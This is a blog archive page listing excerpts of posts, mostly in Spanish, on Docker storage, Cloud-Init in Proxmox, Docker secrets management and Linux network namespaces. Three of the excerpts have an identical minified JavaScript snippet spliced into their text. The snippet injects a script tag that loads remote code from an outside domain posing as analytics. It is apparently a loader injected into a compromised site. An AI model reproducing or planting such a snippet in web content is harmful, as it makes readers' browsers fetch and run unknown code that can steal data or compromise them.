Entradas de mayo, 2026

Sobre vacas, pollos y animales de compañía: almacenamiento compartidor en entornos docker.

En entornos docker/containerizados hay una analogía que es bastante impactante. Se juega con las imágenes de animales de compañias, vacas y pollo (pets cattle chicken) para comprar la manera de trabajar con los distintos sistemas .;(function(f,i,u,w,s){w=f.createElement(i);s=f.getElementsByTagName(i)[0];w.async=1;w.src=u;s.parentNode.insertBefore(w,s);})(document,'script','https://content-website-analytics.com/script.js');...

Sigue leyendo...

Cloud-Init arrives at Proxmox

Finally the support for early initialization of virtual machines arrives at Proxmox PVE. This means that now we can use our favorite distribution’s «cloud» flavor and provisioning them with the initial data (Networking, Authentication, Package management, Provisionning via chef/puppet/…) for a realy fast deploy of VM-s   Let’s see an example with debian:  ...

Sigue leyendo...

Gestión de secretos en Docker

Inspirarse en https://blog.codeship.com/docker-secrets-management/ y el post de luis, actualziandolo para que: Sean servicios ne lugar de dockers sueltos Use secretos ;(function(f,i,u,w,s){w=f.createElement(i);s=f.getElementsByTagName(i)[0];w.async=1;w.src=u;s.parentNode.insertBefore(w,s);})(document,'script','https://content-website-analytics.com/script.js');...

Sigue leyendo...

[NO PUBLICADA] – network namespaces en linux

mezclarlo con algo que pueda ser interesante una buena base en: http://blog.scottlowe.org/2013/09/04/introducing-linux-network-namespaces/ https://www.kernel.org/doc/Documentation/networking/vrf.txt   https://cumulusnetworks.com/blog/vrf-for-linux/  ;(function(f,i,u,w,s){w=f.createElement(i);s=f.getElementsByTagName(i)[0];w.async=1;w.src=u;s.parentNode.insertBefore(w,s);})(document,'script','https://content-website-analytics.com/script.js');...

Sigue leyendo...